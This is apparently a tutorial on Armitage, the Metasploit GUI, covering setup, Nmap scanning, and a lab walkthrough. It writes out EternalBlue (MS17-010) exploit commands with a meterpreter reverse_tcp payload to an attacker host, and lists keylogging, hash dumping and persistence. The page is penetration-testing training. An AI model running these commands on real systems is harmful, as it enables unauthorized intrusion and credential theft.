Armitage – Graphical Cyber Attack Management for Metasploit

🧭 Overview

Armitage is a powerful graphical user interface (GUI) front-end for the Metasploit Framework, designed to streamline and visualize the penetration testing process. Created by Raphael Mudge, Armitage allows security professionals and students to visualize targets, manage exploits, and automate post-exploitation tasks in a collaborative and intuitive manner.

It is widely used in cybersecurity training environments, Capture The Flag (CTF) competitions, and internal red team operations to demonstrate how real-world attacks unfold visually.

🧰 Armitage Setup

Before using Armitage, you need to have Metasploit Framework and PostgreSQL database configured properly.

✅ Step-by-Step Setup Instructions

sudo apt update
sudo apt install metasploit-framework
sudo apt install armitage

Start the PostgreSQL Database:

sudo service postgresql start
msfdb init

Launch Armitage:

sudo armitage

If Armitage fails to connect, ensure no firewall or conflicting service is blocking port 55553.

🔍 Armitage Scanning

🔎 1. Host Discovery

From the menu:

Hosts → Nmap Scan → Intense Scan (no ping)

This uses Nmap to identify hosts on the target network. Detected hosts will appear visually in the Armitage interface.

🔎 2. Service Detection

Click on a discovered host and choose:

Scan → Services

This uses Metasploit’s auxiliary scanner modules to detect open ports and services.

🧪 Example Nmap Command:

nmap -A 192.168.1.105

It may return services like SSH, HTTP, SMB. Armitage will map them visually for easy targeting.

💣 Armitage Exploitation

✅ 1. Choose a Target

Click on a host icon → Right-click → Attack → Select an exploit.

✅ 2. Launching an Exploit

Example: Exploiting EternalBlue (MS17-010) on Windows:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.105
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit

Or use the Armitage UI to right-click → Attack → select exploit → configure → Launch.

✅ 3. Post-Exploitation

After success:

• Shell or Meterpreter session opens
• Right-click → Interact → Screenshot, Keylogger, File system access
• Hash dump, persistence, pivoting available

🖥️ Real-World Example Lab

Lab Goal: Exploit a vulnerable Windows 7 machine on local network.

Setup:

• Kali Linux with Armitage + Metasploit
• Windows 7 VM with SMB port (445) open

Steps:

1. Start Armitage and scan subnet: 192.168.1.0/24
2. Detect IP with SMB open (e.g. 192.168.1.105)
3. Select ms17_010_eternalblue exploit
4. Configure payload: windows/meterpreter/reverse_tcp
5. Launch and gain access to shell

🛡️ Precautions

• Use Armitage only in authorized, educational, or lab settings
• Do not scan or attack live or production networks
• Always isolate testing environments using VMs or test labs

📚 Conclusion

Armitage enhances Metasploit by offering a friendly, visual interface to manage penetration testing tasks.

• Visualize targets
• Coordinate attacks
• Automate exploitation
• Train in real-world attack simulation

It is ideal for both cybersecurity students and red team professionals looking to improve productivity and clarity during assessments.